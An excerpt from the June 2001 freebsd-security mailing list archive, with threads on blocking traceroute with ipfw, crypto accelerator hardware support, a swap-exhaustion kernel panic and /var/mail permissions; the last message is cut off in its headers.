(PDT) (envelope-from simon@inforta.com) Received: from inforta.com (rooky.backnet [192.168.0.2]) by silky.kgr-sp.si (Postfix) with ESMTP id 3AEF1E2C88 for ; Sun, 24 Jun 2001 19:38:25 +0200 (CEST) Message-ID: <3B36267B.5B5FDBE@inforta.com> Date: Sun, 24 Jun 2001 19:42:19 +0200 From: Simon Rakovec X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: disable traceroute to my host References: <006a01c0fb6b$2d64d830$9865fea9@book> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Try this: ipfw add deny udp from any 32769-65535 to 33434-33523 Regards, Simon alexus wrote: > > is it possible to disable using ipfw so people won't be able to traceroute > me? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 11:14:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 8347737B40B for ; Sun, 24 Jun 2001 11:14:36 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 57928 invoked by uid 1000); 24 Jun 2001 18:14:56 -0000 Date: Sun, 24 Jun 2001 20:14:56 +0200 From: "Karsten W. Rohrbach" To: Dag-Erling Smorgrav Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD Message-ID: <20010624201456.A57877@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Dag-Erling Smorgrav , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tThc/1wpZn/ma/RB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 06:38:31PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tThc/1wpZn/ma/RB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 18:38:31 +0000: > "Karsten W. Rohrbach" writes: > > yup, exactly. to me it seems to be a major problem to get some unified > > api out of openssl adressing fucnctions on the hardware -- i simply do > > not know how other crypto chipsets do it, i just investigated the > > rainbow board. they got a patch against openssl 0.9.5 i think, that > > glues in the driver calls instead of standard lib functions. >=20 > Can you dig out this patch for me? It would be a big win if the > userland interface to Soren's hardware were compatible with Rainbow's > driver. i think it would be a wise choice to ask rainbow for the current stuff, as they are stating 4.1-rel would be supported. i get back with the contact addresses to you guys off-list. /k --=20 > Life is a sexually transmitted disease. KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --tThc/1wpZn/ma/RB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Ni4gM0BPTilkv0YRAqjGAJ0ZZGVPeGSBMKNpUdpeVyJsP8baoQCfRPFn ASEQhWh4CnJboT4Iw+auPDs= =xkKz -----END PGP SIGNATURE----- --tThc/1wpZn/ma/RB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 11:34:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 5EE3C37B401 for ; Sun, 24 Jun 2001 11:34:20 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 58543 invoked by uid 1000); 24 Jun 2001 18:34:40 -0000 Date: Sun, 24 Jun 2001 20:34:40 +0200 From: "Karsten W. Rohrbach" To: Simon Rakovec Cc: freebsd-security@freebsd.org Subject: Re: disable traceroute to my host Message-ID: <20010624203440.C57877@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Simon Rakovec , freebsd-security@freebsd.org References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="6zdv2QT/q3FMhpsV" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B36267B.5B5FDBE@inforta.com>; from simon@inforta.com on Sun, Jun 24, 2001 at 07:42:19PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --6zdv2QT/q3FMhpsV Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Simon Rakovec(simon@inforta.com)@2001.06.24 19:42:19 +0000: > Try this: >=20 > ipfw add deny udp from any 32769-65535 to 33434-33523 one might note on that, that this is no proper practice, it simply does no good regarding proper network operation. imagine, there are people out there who operate networks with more than 20 routers -- if you deploy those filter you probably do not make new friends, especially in the isp field. that said, a better choice would be putting /sbin/shutdown -p now in /etc/rc.local *grin* have a nice one /k >=20 > Regards, Simon >=20 > alexus wrote: > >=20 > > is it possible to disable using ipfw so people won't be able to tracero= ute > > me? > >=20 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 > Only wimps use tape backups; real men put their software on ftp-servers > and let the rest of the world mirror it. --Linus Torvalds KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --6zdv2QT/q3FMhpsV Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NjLAM0BPTilkv0YRAm/sAJ9QmbK7udyaTRPksD2mZSwD6k8ByQCgmkLZ ZBDD7oxho1VGjFRGzIMSPAg= =gm+6 -----END PGP SIGNATURE----- --6zdv2QT/q3FMhpsV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 11:53:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from server.soekris.com (soekris.com [216.15.61.44]) by hub.freebsd.org (Postfix) with ESMTP id BFC6537B401; Sun, 24 Jun 2001 11:53:14 -0700 (PDT) (envelope-from soren@soekris.com) Received: from soekris.com (soren.soekris.com [192.168.1.4]) by server.soekris.com (8.9.2/8.9.2) with ESMTP id LAA53569; Sun, 24 Jun 2001 11:53:26 -0700 (PDT) (envelope-from soren@soekris.com) Message-ID: <3B363713.2849219@soekris.com> Date: Sun, 24 Jun 2001 11:53:07 -0700 From: Soren Kristensen Organization: Soekris Engineering X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Karsten W. Rohrbach" Cc: Dag-Erling Smorgrav , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> <20010624201456.A57877@mail.webmonster.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Thanks for the responses so far. First, let me say that I'm a hardware guy, and don't know all the details of FreeBSD's network stack. There is two common kind of hardware encryption acceleration, and I think they're being mixed a little here. SSL is for secure web access, and the main need is for Public Key generating. This don't really have anything to do with the IP stack. Afaik, OpenSSL is more like a extension to the web server software. IPSec is for secure communication, and the main need is for symmetric data encryption, typically using 3-DES. This need to be closely integrated in the IP stack. The boards I'm doing now, is based on a Hi/fn 7951, with is designed for VPM routers doing IPSec. It's supported in OpenBSD 2.9. And btw, hardware beats software anytime. The fastest PC processor right now is about the same speed as the slowest hardware.... The reason why I posted originally was the figure out who are working on these things, as I remember seing a post some time ago about work being done to import some of the IPSec work from OpenBSD. The Kame project people might be the ones to talk to, but isn't there a need for a FreeBSD specifec hardware driver anyway ? I will be happy to donate hardware to the FreeBSD project. Regards, Soren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 12: 8:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-13.dsl.lsan03.pacbell.net [63.207.60.13]) by hub.freebsd.org (Postfix) with ESMTP id 1319F37B401; Sun, 24 Jun 2001 12:08:08 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id F293A66BF7; Sun, 24 Jun 2001 12:08:05 -0700 (PDT) Date: Sun, 24 Jun 2001 12:08:05 -0700 From: Kris Kennaway To: Dag-Erling Smorgrav Cc: "Karsten W. Rohrbach" , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD Message-ID: <20010624120805.A67128@xor.obsecurity.org> References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="2fHTh5uZTiUOsy+g" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 06:38:31PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --2fHTh5uZTiUOsy+g Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jun 24, 2001 at 06:38:31PM +0200, Dag-Erling Smorgrav wrote: > "Karsten W. Rohrbach" writes: > > yup, exactly. to me it seems to be a major problem to get some unified > > api out of openssl adressing fucnctions on the hardware -- i simply do > > not know how other crypto chipsets do it, i just investigated the > > rainbow board. they got a patch against openssl 0.9.5 i think, that > > glues in the driver calls instead of standard lib functions. >=20 > Can you dig out this patch for me? It would be a big win if the > userland interface to Soren's hardware were compatible with Rainbow's > driver. I believe there is support in OpenSSL for this now (though not in the version we currently have imported; it's the OpenSSL-engine branch which supports hardware offload). Once there's a point to do so (e.g. whatever relevant kernel support), I can import this into FreeBSD. Kris --2fHTh5uZTiUOsy+g Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NjqUWry0BWjoQKURAg+fAJ4iaUF0+6iPxnB/HtTkX5sHVnH1cgCggmiu t0KU2V7aB9tszwdu7tHmj8g= =xAkK -----END PGP SIGNATURE----- --2fHTh5uZTiUOsy+g-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 12:52:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 05D5137B401; Sun, 24 Jun 2001 12:52:26 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.3/8.11.2) id f5OJpqV79628; Sun, 24 Jun 2001 12:51:52 -0700 (PDT) (envelope-from dillon) Date: Sun, 24 Jun 2001 12:51:52 -0700 (PDT) From: Matt Dillon Message-Id: <200106241951.f5OJpqV79628@earth.backplane.com> To: Dag-Erling Smorgrav Cc: "Ted Mittelstaedt" , , , , Subject: Re: Kernel Panic References: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : :> However, if the script DID load itself, a recursive script :> under an ordinary user ID isn't allowed to crash the :> system. : :Yes it is, unfortunately. FreeBSD doesn't like running out of swap :space. Matt Dillon has been trying to correct this in -CURRENT, but :it's not completely fixed yet. : :DES :-- :Dag-Erling Smorgrav - des@ofug.org The out of swap handling should be completely fixed on -current and -stable now. My tests and Paul Saab's tests come up roses now. In regards to the original authors bug report... I haven't heard what version of FreeBSD he is running. Under normal circumstances a runaway script should not be able to take the machine down. Prior to the swap handling fixes if sufficient resource limits are set or the script is run as root, then such a script could lockup the machhine. But it is also unclear to me what the author meant by "crash"... did it panic? Was there a panic message? Did it start bashing the disks and appear not to stop? What? -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 14: 0:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from pltn13.pbi.net (mta8.pltn13.pbi.net [64.164.98.22]) by hub.freebsd.org (Postfix) with ESMTP id A3CB337B409 for ; Sun, 24 Jun 2001 14:00:50 -0700 (PDT) (envelope-from leonard@ssl.berkeley.edu) Received: from zeus.berkeley.edu ([206.170.1.101]) by mta8.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GFG00A82D17K5@mta8.pltn13.pbi.net> for security@FreeBSD.ORG; Sun, 24 Jun 2001 14:00:48 -0700 (PDT) Date: Sun, 24 Jun 2001 14:11:54 -0700 From: Leonard Chung Subject: "Correct" permissions on /var/mail? X-Sender: leonard@chung.yikes.com (Unverified) To: security@FreeBSD.ORG Message-id: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was having a debate with a colleague the other day on the correct mode for /var/mail. He claimed that 1777 is more secure than what I've always had (the FreeBSD default of root:mail 775). 1777 gives you the additional benefit of protecting you from compromises on the mail group, but requires that on every machine quotas be installed even for machines with just one or two users. Without quotas, a malicious user could fill up /var/mail creating a DoS for everybody receiving mail off that machine. 775 doesn't protect against compromises of the mail group, but has the added benefit that it protects against a user filling /var/mail inadvertently as they would have to purposely send lots of e-mail. Which do most of you use? Is there a reason /var/mail is initially set to 775 rather than 1777? Thanks, Leonard -- Leonard Chung - SETI@home - The Search for Extraterrestrial Intelligence @ home http://www.setiathome.ssl.berkeley.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 14: 5:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from i-sphere.com (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id E475837B406 for ; Sun, 24 Jun 2001 14:05:49 -0700 (PDT) (envelope-from fasty@i-sphere.com) Received: (from fasty@localhost) by i-sphere.com (8.11.3/8.11.3) id f5OLDMS77908; Sun, 24 Jun 2001 14:13:22 -0700 (PDT) (envelope-from fasty) Date: Sun, 24 Jun 2001 14:13:22 -0700 From: faSty To: Leonard Chung Cc: freebsd-security@freebsd.org Subject: Re: "Correct" permissions on /var/mail? Message-ID: <20010624141322.A77852@i-sphere.com> References: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com>; from leonard@ssl.berkeley.edu on Sun, Jun 24, 2001 at 02:11:54PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, the FreeBSD default 775 on /var/mail but my email server kept complain stated /var/mail is security potiental so i had to set 1777 to shut the email server up. It seems safe no security expliot lately on my shell server with 20 hardcore shell customers. PS. This is going interesting topic discuss.. Im forwarding hear other people's opinion. -trev On Sun, Jun 24, 2001 at 02:11:54PM -0700, Leonard Chung wrote: > I was having a debate with a colleague the other day on the correct mode > for /var/mail. He claimed that 1777 is more secure than what I've always > had (the FreeBSD default of root:mail 775). > > 1777 gives you the additional benefit of protecting you from compromises on > the mail group, but requires that on every machine quotas be installed even > for machines with just one or two users. Without quotas, a malicious user > could fill up /var/mail creating a DoS for everybody receiving mail off > that machine. 775 doesn't protect against compromises of the mail group, > but has the added benefit that it protects against a user filling /var/mail > inadvertently as they would have to purposely send lots of e-mail. > > Which do most of you use? Is there a reason /var/mail is initially set to > 775 rather than 1777? > > Thanks, > > Leonard > > > -- > Leonard Chung - > SETI@home - The Search for Extraterrestrial Intelligence @ home > http://www.setiathome.ssl.berkeley.edu > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 22:29:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id E854037B405 for ; Sun, 24 Jun 2001 22:29:37 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 9938 invoked from network); 25 Jun 2001 05:30:22 -0000 Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 05:30:22 -0000 Message-ID: <006101c0fd37$f93f7cd0$0100a8c0@alexus> From: "alexus" To: "Simon Rakovec" , References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 01:30:39 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org where did you get those numbers? ----- Original Message ----- From: "Simon Rakovec" To: Sent: Sunday, June 24, 2001 1:42 PM Subject: Re: disable traceroute to my host > Try this: > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > Regards, Simon > > alexus wrote: > > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 22:31:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.tgd.net (rand.tgd.net [64.81.67.117]) by hub.freebsd.org (Postfix) with SMTP id 328D837B401 for ; Sun, 24 Jun 2001 22:31:30 -0700 (PDT) (envelope-from sean@mailhost.tgd.net) Received: (qmail 64012 invoked by uid 1001); 25 Jun 2001 05:31:23 -0000 Date: Sun, 24 Jun 2001 22:31:23 -0700 From: sean-freebsd-security@chittenden.org To: alexus Cc: freebsd-security@freebsd.org Subject: Re: disable traceroute to my host Message-ID: <20010624223123.B44590@rand.tgd.net> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <006101c0fd37$f93f7cd0$0100a8c0@alexus> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: <006101c0fd37$f93f7cd0$0100a8c0@alexus>; from "ml@db.nexgen.com" on Mon, Jun 25, 2001 at = 01:30:39AM X-PGP-Key: 0x1EDDFAAD X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD X-Web-Homepage: http://sean.chittenden.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable man traceroute [snip] -p Protocol specific. For UDP and TCP, sets the base port number used in probes (default is 33434). Traceroute hopes that nothing is listening on UDP ports base to base + nhops - 1 at the destination host (so an ICMP PORT_UNREACHABLE message will be returned to terminate the route tracing). If some- thing is listening on a port in the default range, this option can be used to pick an unused port range. -sc On Mon, Jun 25, 2001 at 01:30:39AM -0400, alexus wrote: > Delivered-To: chittenden.org-sean-freebsd-security@chittenden.org > Delivered-To: freebsd-security@freebsd.org > From: "alexus" > To: "Simon Rakovec" , > > Subject: Re: disable traceroute to my host > Date: Mon, 25 Jun 2001 01:30:39 -0400 > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 6.00.2462.0000 > X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 > List-ID: > List-Archive: (Web Archive) > List-Help: (List Instructions) > List-Subscribe: > List-Unsubscribe: > X-Loop: FreeBSD.org > Precedence: bulk >=20 > where did you get those numbers? >=20 > ----- Original Message ----- > From: "Simon Rakovec" > To: > Sent: Sunday, June 24, 2001 1:42 PM > Subject: Re: disable traceroute to my host >=20 >=20 > > Try this: > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > Regards, Simon > > > > alexus wrote: > > > > > > is it possible to disable using ipfw so people won't be able to > traceroute > > > me? > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 Sean Chittenden --WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: Sean Chittenden iEYEARECAAYFAjs2zKoACgkQn09c7x7d+q2EiACfYRwTNthgkq3xu4JfDnEjrPNd /0IAoIVZlpQobvez2B3dvDWyMAlmU6c+ =UqSu -----END PGP SIGNATURE----- --WYTEVAkct0FjGQmd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 23: 3:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id EA1FE37B401; Sun, 24 Jun 2001 23:03:12 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id IAA85599; Mon, 25 Jun 2001 08:03:07 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Soren Kristensen Cc: "Karsten W. Rohrbach" , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> <20010624201456.A57877@mail.webmonster.de> <3B363713.2849219@soekris.com> From: Dag-Erling Smorgrav Date: 25 Jun 2001 08:03:07 +0200 In-Reply-To: <3B363713.2849219@soekris.com> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Soren Kristensen writes: > SSL is for secure web access, and the main need is for Public Key > generating. This don't really have anything to do with the IP stack. > Afaik, OpenSSL is more like a extension to the web server software. Try 'man openssl', or just 'openssl -help'. You'll be surprised... DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 23:31:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from albatross.prod.itd.earthlink.net (albatross.mail.pas.earthlink.net [207.217.120.120]) by hub.freebsd.org (Postfix) with ESMTP id 4E7D837B401 for ; Sun, 24 Jun 2001 23:31:09 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from blossom.cjclark.org (dialup-209.247.139.131.Dial1.SanJose1.Level3.net [209.247.139.131]) by albatross.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id XAA17320; Sun, 24 Jun 2001 23:30:39 -0700 (PDT) Received: (from cjc@localhost) by blossom.cjclark.org (8.11.4/8.11.3) id f5P6VsB18347; Sun, 24 Jun 2001 23:31:54 -0700 (PDT) (envelope-from cjc) Date: Sun, 24 Jun 2001 23:31:54 -0700 From: "Crist J. Clark" To: faSty Cc: Leonard Chung , freebsd-security@FreeBSD.ORG Subject: Re: "Correct" permissions on /var/mail? Message-ID: <20010624233154.N11961@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com> <20010624141322.A77852@i-sphere.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010624141322.A77852@i-sphere.com>; from fasty@i-sphere.com on Sun, Jun 24, 2001 at 02:13:22PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 24, 2001 at 02:13:22PM -0700, faSty wrote: > Yes, the FreeBSD default 775 on /var/mail but my email server kept complain > stated /var/mail is security potiental so i had to set 1777 to shut the email > server up. It seems safe no security expliot lately on my shell server with > 20 hardcore shell customers. > > PS. This is going interesting topic discuss.. Im forwarding hear other people's > opinion. I'm not. Devolves into a religious war. I just had to sit through one of these on another mailing list. If you want to see some opinions on this go to this link, http://www.securityfocus.com/archive/1/184210 And follow the thread it started (click "Thread Index" at the top of the frame and look for the side threads it started too, "Mail delivery privileges"). No need to start this here. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 23:39:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6808E37B401 for ; Sun, 24 Jun 2001 23:39:18 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 7865 invoked by uid 1000); 25 Jun 2001 06:37:31 -0000 Date: Mon, 25 Jun 2001 09:37:31 +0300 From: Peter Pentchev To: Simon Rakovec Cc: freebsd-security@freebsd.org Subject: Re: disable traceroute to my host Message-ID: <20010625093731.A934@ringworld.oblivion.bg> Mail-Followup-To: Simon Rakovec , freebsd-security@freebsd.org References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B36267B.5B5FDBE@inforta.com>; from simon@inforta.com on Sun, Jun 24, 2001 at 07:42:19PM 